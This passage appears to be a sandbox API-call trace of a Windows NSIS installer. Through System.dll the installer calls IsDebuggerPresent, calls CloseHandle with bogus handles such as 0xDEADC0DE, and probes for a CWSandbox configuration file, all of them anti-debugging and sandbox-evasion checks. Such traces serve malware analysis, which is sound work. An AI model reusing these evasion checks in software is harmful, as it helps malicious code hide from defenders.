returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.863] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.863] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.863] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.863] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.863] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.863] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.863] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.863] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.863] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::IsDebuggerPresent()i.R0", iMaxLength=1024 | out: lpString1="kernel32::IsDebuggerPresent()i.R0") returned="kernel32::IsDebuggerPresent()i.R0" [0157.863] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.864] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.864] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.864] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.864] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.864] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.864] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.864] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.864] lstrcpyA (in: lpString1=0x321ba8, lpString2="IsDebuggerPresent" | out: lpString1="IsDebuggerPresent") returned="IsDebuggerPresent" [0157.865] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.865] GetProcAddress (hModule=0x75c90000, lpProcName="IsDebuggerPresent") returned 0x75ca4a5d [0157.865] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.865] IsDebuggerPresent () returned 0 [0157.865] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.865] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.865] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.865] lstrlenA (lpString="0") returned 1 [0157.865] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.865] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.865] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.865] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.865] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.865] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.866] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.866] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.866] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.866] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.866] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.866] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::CloseHandle(i 0)i.R0", iMaxLength=1024 | out: lpString1="kernel32::CloseHandle(i 0)i.R0") returned="kernel32::CloseHandle(i 0)i.R0" [0157.866] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.866] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.866] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.866] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.867] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.867] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.867] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.867] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.867] lstrcpyA (in: lpString1=0x321ba8, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0157.868] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.868] GetProcAddress (hModule=0x75c90000, lpProcName="CloseHandle") returned 0x75ca1410 [0157.868] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.868] CloseHandle (hObject=0x0) returned 0 [0157.868] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.868] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.868] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.868] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.868] lstrlenA (lpString="0") returned 1 [0157.868] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.869] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.869] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.869] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.869] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.869] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.869] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.869] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.869] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.869] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.869] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.869] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::CloseHandle(i 0xDEADC0DE)i.R0", iMaxLength=1024 | out: lpString1="kernel32::CloseHandle(i 0xDEADC0DE)i.R0") returned="kernel32::CloseHandle(i 0xDEADC0DE)i.R0" [0157.870] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.870] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.870] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.870] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.870] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.870] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.870] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.870] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.870] lstrcpyA (in: lpString1=0x321ba8, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0157.870] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.871] GetProcAddress (hModule=0x75c90000, lpProcName="CloseHandle") returned 0x75ca1410 [0157.871] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.871] CloseHandle (hObject=0xdeadc0de) returned 0 [0157.871] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="-559038242") returned 10 [0157.871] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.871] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.871] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.871] lstrlenA (lpString="0") returned 1 [0157.871] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.871] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.871] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.871] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.872] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.872] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.872] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.872] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.872] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.872] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.872] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.872] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::CloseHandle(i 0xFEFEDEAF)i.R0", iMaxLength=1024 | out: lpString1="kernel32::CloseHandle(i 0xFEFEDEAF)i.R0") returned="kernel32::CloseHandle(i 0xFEFEDEAF)i.R0" [0157.872] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.872] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.872] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.873] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.873] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.873] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.873] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.873] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.873] lstrcpyA (in: lpString1=0x321ba8, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0157.873] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.874] GetProcAddress (hModule=0x75c90000, lpProcName="CloseHandle") returned 0x75ca1410 [0157.874] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.874] CloseHandle (hObject=0xfefedeaf) returned 0 [0157.874] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="-16851281") returned 9 [0157.874] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.874] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.874] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.874] lstrlenA (lpString="0") returned 1 [0157.874] lstrcpynA (in: lpString1=0x40a418, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.874] lstrlenA (lpString="FALSE") returned 5 [0157.874] lstrcpynA (in: lpString1=0x432800, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.874] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.874] lstrcpynA (in: lpString1=0x42e3a0, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.874] lstrlenA (lpString="FALSE") returned 5 [0157.874] lstrcpynA (in: lpString1=0x40ac18, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.874] lstrcpynA (in: lpString1=0x40b018, lpString2="TRUE", iMaxLength=1024 | out: lpString1="TRUE") returned="TRUE" [0157.874] lstrcmpiA (lpString1="FALSE", lpString2="TRUE") returned -1 [0157.875] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.875] lstrlenA (lpString="") returned 0 [0157.875] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.875] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.875] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.875] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.875] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.875] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.875] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.875] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.875] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.875] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.875] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.876] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.876] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetFileAttributes(t 'c:\\cwsandbox\\cwsandbox.ini')i .R0", iMaxLength=1024 | out: lpString1="kernel32::GetFileAttributes(t 'c:\\cwsandbox\\cwsandbox.ini')i .R0") returned="kernel32::GetFileAttributes(t 'c:\\cwsandbox\\cwsandbox.ini')i .R0" [0157.876] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.876] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.876] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.876] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.876] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.876] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.877] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.877] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.877] lstrcpyA (in: lpString1=0x321ba8, lpString2="GetFileAttributes" | out: lpString1="GetFileAttributes") returned="GetFileAttributes" [0157.877] lstrcpynA (in: lpString1=0x322c50, lpString2="c:\\cwsandbox\\cwsandbox.ini", iMaxLength=1024 | out: lpString1="c:\\cwsandbox\\cwsandbox.ini") returned="c:\\cwsandbox\\cwsandbox.ini" [0157.877] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.877] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributes") returned 0x0 [0157.877] lstrlenA (lpString="GetFileAttributes") returned 17 [0157.877] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributesA") returned 0x75ca5414 [0157.877] lstrcpynA (in: lpString1=0x321398, lpString2="c:\\cwsandbox\\cwsandbox.ini", iMaxLength=1024 | out: lpString1="c:\\cwsandbox\\cwsandbox.ini") returned="c:\\cwsandbox\\cwsandbox.ini" [0157.877] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.878] GetFileAttributesA (lpFileName="c:\\cwsandbox\\cwsandbox.ini" (normalized: "c:\\cwsandbox\\cwsandbox.ini")) returned 0xffffffff [0157.878] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\cwsandbox\\cwsandbox.ini", iMaxLength=1024 | out: lpString1="c:\\cwsandbox\\cwsandbox.ini") 